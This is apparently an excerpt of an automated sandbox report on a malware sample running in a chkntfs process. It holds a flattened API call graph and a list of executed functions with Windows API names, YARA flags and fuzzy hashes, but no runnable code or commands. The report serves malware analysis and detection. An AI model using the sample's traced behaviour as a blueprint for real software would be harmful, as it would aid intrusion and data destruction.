5b7841 100023->100025 100029 4812d10 LdrInitializeThunk 100024->100029 100025->100017 100026 5b7904 100026->100017 100028->100021 100029->100026 100030 5b0971 100042 5b7e50 100030->100042 100032 5b0992 100033 5b09b0 100032->100033 100034 5b09c5 100032->100034 100035 5b7fc0 NtClose 100033->100035 100036 5b7fc0 NtClose 100034->100036 100037 5b09b9 100035->100037 100039 5b09ce 100036->100039 100038 5b09fa 100039->100038 100040 5b9eb0 RtlFreeHeap 100039->100040 100041 5b09ee 100040->100041 100043 5b7ee9 100042->100043 100045 5b7e71 100042->100045 100044 5b7eff NtReadFile 100043->100044 100044->100032 100045->100032 100046 5a6ff0 100047 5a7008 100046->100047 100049 5a7062 100046->100049 100047->100049 100050 5aabe0 100047->100050 100051 5aac06 100050->100051 100052 5aae25 100051->100052 100077 5b83b0 100051->100077 100052->100049 100054 5aac7c 100054->100052 100080 5bb0c0 100054->100080 100056 5aac98 100056->100052 100057 5aad69 100056->100057 100086 5b7660 100056->100086 100059 5a56d0 LdrInitializeThunk 100057->100059 100061 5aad88 100057->100061 100059->100061 100076 5aae0d 100061->100076 100093 5b7230 100061->100093 100062 5a7b40 LdrInitializeThunk 100067 5aad5f 100062->100067 100063 5aacfd 100063->100052 100069 5aad2f 100063->100069 100071 5aad51 100063->100071 100090 5a56d0 100063->100090 100067->100049 100068 5a7b40 LdrInitializeThunk 100072 5aae1b 100068->100072 100108 5b3810 LdrInitializeThunk 100069->100108 100070 5aade4 100098 5b72d0 100070->100098 100071->100062 100072->100049 100074 5aadfe 100103 5b7410 100074->100103 100076->100068 100078 5b83cd 100077->100078 100079 5b83de CreateProcessInternalW 100078->100079 100079->100054 100081 5bb030 100080->100081 100082 5bb08d 100081->100082 100109 5b9f90 100081->100109 100082->100056 100084 5bb06a 100085 5b9eb0 RtlFreeHeap 100084->100085 100085->100082 100087 5b767d 100086->100087 100115 4812c0a 100087->100115 100088 5aacf4 100088->100057 100088->100063 100091 5b7820 LdrInitializeThunk 100090->100091 100092 5a570e 100091->100092 100092->100069 100094 5b72a2 100093->100094 100096 5b7254 100093->100096 100118 48139b0 LdrInitializeThunk 100094->100118 100095 5b72c7 100095->100070 100096->100070 100099 5b7342 100098->100099 100100 5b72f4 100098->100100 100119 4814340 LdrInitializeThunk 100099->100119 100100->100074 100101 5b7367 100101->100074 100104 5b747f 100103->100104 100105 5b7431 100103->100105 100120 4812fb0 LdrInitializeThunk 100104->100120 100105->100076 100106 5b74a4 100106->100076 100108->100071 100112 5b82d0 100109->100112 100111 5b9fab 100111->100084 100113 5b82ea 100112->100113 100114 5b82fb RtlAllocateHeap 100113->100114 100114->100111 100116 4812c11 100115->100116 100117 4812c1f LdrInitializeThunk 100115->100117 100116->100088 100117->100088 100118->100095 100119->100101 100120->100106 100121 5af7f0 100122 5af80d 100121->100122 100123 5a44a0 LdrLoadDll 100122->100123 100124 5af82b 100123->100124 100405 5a0ab0 100406 5a0aca 100405->100406 100407 5a44a0 LdrLoadDll 100406->100407 100408 5a0ae8 100407->100408 100409 5a0b2d 100408->100409 100410 5a0b1c PostThreadMessageW 100408->100410 100410->100409 100411 5aef30 100412 5aef94 100411->100412 100413 5a5fc0 2 API calls 100412->100413 100415 5af0bd 100413->100415 100414 5af0c4 100415->100414 100440 5a60d0 100415->100440 100417 5af263 100418 5af140 100418->100417 100419 5af272 100418->100419 100444 5aed10 100418->100444 100420 5b7fc0 NtClose 100419->100420 100422 5af27c 100420->100422 100423 5af175 100423->100419 100424 5af180 100423->100424 100425 5b9f90 RtlAllocateHeap 100424->100425 100426 5af1a9 100425->100426 100427 5af1c8 100426->100427 100428 5af1b2 100426->100428 100453 5aec00 CoInitialize 100427->100453 100429 5b7fc0 NtClose 100428->100429 100431 5af1bc 100429->100431 100432 5af1d6 100455 5b7ac0 100432->100455 100434 5af252 100435 5b7fc0 NtClose 100434->100435 100436 5af25c 100435->100436 100437 5b9eb0 RtlFreeHeap 100436->100437 100437->100417 100438 5af1f4 100438->100434 100439 5b7ac0 LdrInitializeThunk 100438->100439 100439->100438 100441 5a60f5 100440->100441 100459 5b7960 100441->100459 100445 5aed2c 100444->100445 100446 5a44a0 LdrLoadDll 100445->100446 100448 5aed4a 100446->100448 100447 5aed53 100447->100423 100448->100447 100449 5a44a0 LdrLoadDll 100448->100449 100450 5aee1e 100449->100450 100451 5a44a0 LdrLoadDll 100450->100451 100452 5aee7b 100450->100452 100451->100452 100452->100423 100454 5aec65 100453->100454 100454->100432 100456 5b7ada 100455->100456 100464 4812ba0 LdrInitializeThunk 100456->100464 100457 5b7b0a 100457->100438 100460 5b797a 100459->100460 100463 4812c60 LdrInitializeThunk 100460->100463 100461 5a6169 100461->100418 100463->100461 100464->100457 100125 5b7cf0 100126 5b7d15 100125->100126 100127 5b7d99 100125->100127 100128 5b7daf NtCreateFile 100127->100128 100129 5b1170 100130 5b117f 100129->100130 100131 5b11c6 100130->100131 100134 5b1204 100130->100134 100136 5b1209 100130->100136 100132 5b9eb0 RtlFreeHeap 100131->100132 100133 5b11d6 100132->100133 100135 5b9eb0 RtlFreeHeap 100134->100135 100135->100136 100137 5baff0 100138 5b9eb0 RtlFreeHeap 100137->100138 100139 5bb005 100138->100139 100465 5b74b0 100466 5b7531 100465->100466 100468 5b74d1 100465->100468 100470 4812ee0 LdrInitializeThunk 100466->100470 100467 5b7562 100470->100467 100471 5b7f30 100472 5b7f99 100471->100472 100473 5b7f51 100471->100473 100474 5b7faf NtDeleteFile 100472->100474 100145 5aa6e0 100150 5aa410 100145->100150 100147 5aa6ed 100164 5aa0b0 100147->100164 100149 5aa709 100151 5aa435 100150->100151 100175 5a7d90 100151->100175 100154 5aa572 100154->100147 100156 5aa589 100156->100147 100157 5aa580 100157->100156 100158 5aa671 100157->100158 100190 5a9b10 100157->100190 100161 5aa6c9 100158->100161 100199 5a9e70 100158->100199 100162 5b9eb0 RtlFreeHeap 100161->100162 100163 5aa6d0 100162->100163 100163->100147 100165 5aa0c6 100164->100165 100172 5aa0d1 100164->100172 100166 5b9f90 RtlAllocateHeap 100165->100166 100166->100172 100167 5aa0e7 100167->100149 100168 5a7d90 GetFileAttributesW 100168->100172 100169 5aa3de 100170 5aa3f7 100169->100170 100171 5b9eb0 RtlFreeHeap 100169->100171 100170->100149 100171->100170 100172->100167 100172->100168 100172->100169 100173 5a9b10 RtlFreeHeap 100172->100173 100174 5a9e70 RtlFreeHeap 100172->100174 100173->100172 100174->100172 100176 5a7db1 100175->100176 100177 5a7db8 GetFileAttributesW 100176->100177 100178 5a7dc3 100176->100178 100177->100178 100178->100154 100179 5b2440 100178->100179 100180 5b244e 100179->100180 100181 5b2455 100179->100181 100180->100157 100182 5a44a0 LdrLoadDll 100181->100182 100183 5b248a 100182->100183 100184 5b2499 100183->100184 100203 5b1f10 LdrLoadDll 100183->100203 100186 5b9f90 RtlAllocateHeap 100184->100186 100189 5b2634 100184->100189 100188 5b24b2 100186->100188 100187 5b9eb0 RtlFreeHeap 100187->100189 100188->100187 100188->100189 100189->100157 100191 5a9b36 100190->100191 100204 5ad350 100191->100204 100193 5a9b9d 100195 5a9d20 100193->100195 100196 5a9bbb 100193->100196 100194 5a9d05 100194->100157 100195->100194 100197 5a99d0 RtlFreeHeap 100195->100197 100196->100194 100209 5a99d0 100196->100209 100197->100195 100200 5a9e96 100199->100200 100201 5ad350 RtlFreeHeap 100200->100201 100202 5a9f12 100201->100202 100202->100158 100203->100184 100206 5ad366 100204->100206 100205 5ad373 100205->100193 100206->100205 100207 5b9eb0 RtlFreeHeap 100206->100207 100208 5ad3ac 100207->100208 100208->100193 100210 5a99e6 100209->100210 100213 5ad3c0 100210->100213 100212 5a9aec 100212->100196 100214 5ad3e4 100213->100214 100215 5ad47c 100214->100215 100216 5b9eb0 RtlFreeHeap 100214->100216 100215->100212 100216->100215 100217 5a57e0 100218 5a5816 100217->100218 100219 5b7660 LdrInitializeThunk 100217->100219 100222 5b8060 100218->100222 100219->100218 100221 5a582b 100223 5b80e1 100222->100223 100225 5b8081 100222->100225 100227 4812e80 LdrInitializeThunk 100223->100227 100224 5b8112 100224->100221 100225->100221 100227->100224 100228 5b4960 100229 5b49bd 100228->100229 100230 5b49f4 100229->100230 100233 5b0820 100229->100233 100232 5b49d6 100234 5b0830 100233->100234 100235 5b09b0 100234->100235 100236 5b09c5 100234->100236 100237 5b088d 100234->100237 100238 5b7fc0 NtClose 100235->100238 100239 5b7fc0 NtClose 100236->100239 100237->100232 100240 5b09b9 100238->100240 100242 5b09ce 100239->100242 100240->100232 100241 5b09fa 100241->100232 100242->100241 100243 5b9eb0 RtlFreeHeap 100242->100243 100244 5b09ee 100243->100244 100244->100232 100245 5b0de0 100246 5b0dfc 100245->100246 100247 5b0e38 100246->100247 100248 5b0e24 100246->100248 100250 5b7fc0 NtClose 100247->100250 100249 5b7fc0 NtClose 100248->100249 100251 5b0e2d 100249->100251 100252 5b0e41 100250->100252 100255 5b9fd0 RtlAllocateHeap 100252->100255 100254 5b0e4c 100255->100254

                                                    Executed Functions

                                                    Function 005ABE80 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,00000000), ref: 005ABF64
                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 005ABF9F
                                                    • FindClose.KERNEL32(?), ref: 005ABFAA
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: d2c9a4672d6072162e21dc9ecbc02a90e8f2c2a523b4b5f63bafa58914b18df5
                                                    • Instruction ID: a9d806cd45774c30473333dd2cba6bb7f46aa81c35a6bfe6f4f0503671c19733
                                                    • Opcode Fuzzy Hash: d2c9a4672d6072162e21dc9ecbc02a90e8f2c2a523b4b5f63bafa58914b18df5
                                                    • Instruction Fuzzy Hash: 3B3163B5900209BFEB65DF60DC89FFF7B7CAF85744F144458B908A6181DB70AA848BA4
                                                    Function 005B7CF0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 005B7DE0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 75279bf67c72433dc868e622db3277a73c0b4bd9d1c6fe3d9ff29aa1fe662734
                                                    • Instruction ID: 13992d2bd96fb3883c94922f7527f873dd710fb934b55702455ff3887d69b22a
                                                    • Opcode Fuzzy Hash: 75279bf67c72433dc868e622db3277a73c0b4bd9d1c6fe3d9ff29aa1fe662734
                                                    • Instruction Fuzzy Hash: 3A31C5B5A00609AFCB54DF99D885EDFBBF9BF8C314F108209F919A3240D634A951CBA4
                                                    Function 005B7E50 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 005B7F28
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 61f68cac36994dead62502addce9d6c3dd949970703a8b95a33fd73ecc274809
                                                    • Instruction ID: a7e08c412aabf708419bc68568d3523e1c2c9a9150358f78d55a35fd0209e8fd
                                                    • Opcode Fuzzy Hash: 61f68cac36994dead62502addce9d6c3dd949970703a8b95a33fd73ecc274809
                                                    • Instruction Fuzzy Hash: BE31E8B5A00609AFCB14DF59D885EEFBBB9FF8C314F108209F918A7241D774A811CBA5
                                                    Function 005B8120 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(005A1A1E,?,005B6D97,00000000,00000004,00003000,?,?,?,?,?,005B6D97,005A1A1E,?,005B6D97,00000000), ref: 005B81DD
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 36a4d02ee2a0df2c9d2fb0717725e3f0ea3bc640ba6f7b2134a6fd74e7091433
                                                    • Instruction ID: 7d1edc3951a318e7da47437687efcb642bd7c0f85f3d7e635db878033b37cd00
                                                    • Opcode Fuzzy Hash: 36a4d02ee2a0df2c9d2fb0717725e3f0ea3bc640ba6f7b2134a6fd74e7091433
                                                    • Instruction Fuzzy Hash: 97210AB5A00209ABDB14DF59DC85EEF7BB9FF88710F108209FD19A7281D674B811CBA5
                                                    Function 005B7F30 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 2a7ecd3c62ca96b2fe060ccac0d5b94e08a57ca1687d15670017fd21baf6cbf6
                                                    • Instruction ID: 6dba0c3bfd1f001eae9170a93612d159c552b8523a8c07909aec5e2c5b78bbed
                                                    • Opcode Fuzzy Hash: 2a7ecd3c62ca96b2fe060ccac0d5b94e08a57ca1687d15670017fd21baf6cbf6
                                                    • Instruction Fuzzy Hash: 4101A175A00205BBD720EB64DC4AFEB77ACFBC9710F004109FA1D97181D6707910C7A5
                                                    Function 005B7FC0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005B7FF7
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 817e2567bc62e56100014767b2572e00ff330e1eaff4d4c65aea6d1d8504f529
                                                    • Instruction ID: 36fa1cc737d5fd0d95dee3006fcf507bda3002c5c0a0fdb72e8a289e5304eb44
                                                    • Opcode Fuzzy Hash: 817e2567bc62e56100014767b2572e00ff330e1eaff4d4c65aea6d1d8504f529
                                                    • Instruction Fuzzy Hash: 8AE086362002157BC620FA59DC45FDB7B6CEFC6760F004415FA0CA7142C671790087F5
                                                    Function 04814650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6069cd6d4ca3c75e01786dbdfbdc71e69abe5417d4196d3b19a582ddaea87c4f
                                                    • Instruction ID: f3d168df2f9175a5975566fa76fe4de99ec70bf76a02a5e351850bd41ace9418
                                                    • Opcode Fuzzy Hash: 6069cd6d4ca3c75e01786dbdfbdc71e69abe5417d4196d3b19a582ddaea87c4f
                                                    • Instruction Fuzzy Hash: 0E9002616015105665407158490540660059BE1305395C715A5569560C8A18D9D9926A
                                                    Function 04814340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ed8810fc444e41af232d84b1e719a5f35711cec10dd6c0f7f820a0475bca05de
                                                    • Instruction ID: b58b4cbf418d27af2c5e06ed18483bb454b88f7b4eda46e9308312c80fcbdfa0
                                                    • Opcode Fuzzy Hash: ed8810fc444e41af232d84b1e719a5f35711cec10dd6c0f7f820a0475bca05de
                                                    • Instruction Fuzzy Hash: 5190023160581026B5407158498554640059BE0305B55C611E5439554C8E14DADA5362
                                                    Function 04812CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f98c8a0b6220c5921a1cccb641a986fd498b55cbe74b354b08ca8ead45108830
                                                    • Instruction ID: 6a90c1f1753daaf75871e868a9b8e2d0539f73bc04179adebe3c8c50208efaac
                                                    • Opcode Fuzzy Hash: f98c8a0b6220c5921a1cccb641a986fd498b55cbe74b354b08ca8ead45108830
                                                    • Instruction Fuzzy Hash: 8190023120141416F5007598550964600058BE0305F55D611AA039555ECA65D9D56132
                                                    Function 04812C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 20b6662ac36ee7bca9af8b7cd9db36076e619c3a636147d12f846cc5872cf90a
                                                    • Instruction ID: da4dc9764e120c6a9ff6bac63e3158555944a89419c04d7486d943c5d09fde96
                                                    • Opcode Fuzzy Hash: 20b6662ac36ee7bca9af8b7cd9db36076e619c3a636147d12f846cc5872cf90a
                                                    • Instruction Fuzzy Hash: 9A90023120141856F50071584505B4600058BE0305F55C616A5139654D8A15D9D57522
                                                    Function 04812C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e1333aff528636eb64844defca9d6315ca0cc711e090f4414d08a11571f3f77e
                                                    • Instruction ID: 671ecf6d5c7925ca490c6f45c45c1b7f409a9bcb965fe3a7f408f86f003c3d6e
                                                    • Opcode Fuzzy Hash: e1333aff528636eb64844defca9d6315ca0cc711e090f4414d08a11571f3f77e
                                                    • Instruction Fuzzy Hash: 8390023120149816F5107158850574A00058BD0305F59CA11A9439658D8A95D9D57122
                                                    Function 04812DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 277aa8cab238c00a5fbca330c9d97d5fe58f740f610625d225f4a3afe37b315a
                                                    • Instruction ID: f557c709695700815b9bfb1945542a02b2e7e68e6a006a35f89f622cb07912a4
                                                    • Opcode Fuzzy Hash: 277aa8cab238c00a5fbca330c9d97d5fe58f740f610625d225f4a3afe37b315a
                                                    • Instruction Fuzzy Hash: 4C900221242451667945B158450550740069BE0245795C612A6429950C8926E9DAD622
                                                    Function 04812DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8c8cc5a351173261fa76cff1c89536c3aaaac8ee936bfdf3a9285f1c6561edff
                                                    • Instruction ID: 7702f0eafbaf6b88bcbf92fac28ec20e44ed0012d4d4df1562c1c2302fde5516
                                                    • Opcode Fuzzy Hash: 8c8cc5a351173261fa76cff1c89536c3aaaac8ee936bfdf3a9285f1c6561edff
                                                    • Instruction Fuzzy Hash: B390023120141427F5117158460570700098BD0245F95CA12A5439558D9A56DAD6A122
                                                    Function 04812D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6913fddc48c119e8dde916b71b87b116dd61b999376f93d0ef81f2c3273bf1ef
                                                    • Instruction ID: 83d929d15ca26241bf8fde50f0dc86b8ea6f6b7dcd7d917d71ae5fa8eaa6ac86
                                                    • Opcode Fuzzy Hash: 6913fddc48c119e8dde916b71b87b116dd61b999376f93d0ef81f2c3273bf1ef
                                                    • Instruction Fuzzy Hash: C190022921341016F5807158550960A00058BD1206F95DA15A502A558CCD15D9ED5322
                                                    Function 04812D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 985936ecaf5a78e41bf65fb3f8bfba88f2fd5234742d0a490e1ceb60b0fe049f
                                                    • Instruction ID: 488fe9662c41020b886872b46abf64829318099ef47ce86ac79186668516db2d
                                                    • Opcode Fuzzy Hash: 985936ecaf5a78e41bf65fb3f8bfba88f2fd5234742d0a490e1ceb60b0fe049f
                                                    • Instruction Fuzzy Hash: DD90022130141017F540715855196064005DBE1305F55D611E5429554CDD15D9DA5223
                                                    Function 04812E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b95740ad6d2b099921d57c5d2aa14d329e6511dec8df943c047b59a5888042d7
                                                    • Instruction ID: 4002912206949dfb12f38959a94e227c365bb57e13f7164047917c04f4c384f4
                                                    • Opcode Fuzzy Hash: b95740ad6d2b099921d57c5d2aa14d329e6511dec8df943c047b59a5888042d7
                                                    • Instruction Fuzzy Hash: 8490022160141516F50171584505616000A8BD0245F95C622A6039555ECE25DAD6A132
                                                    Function 04812EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
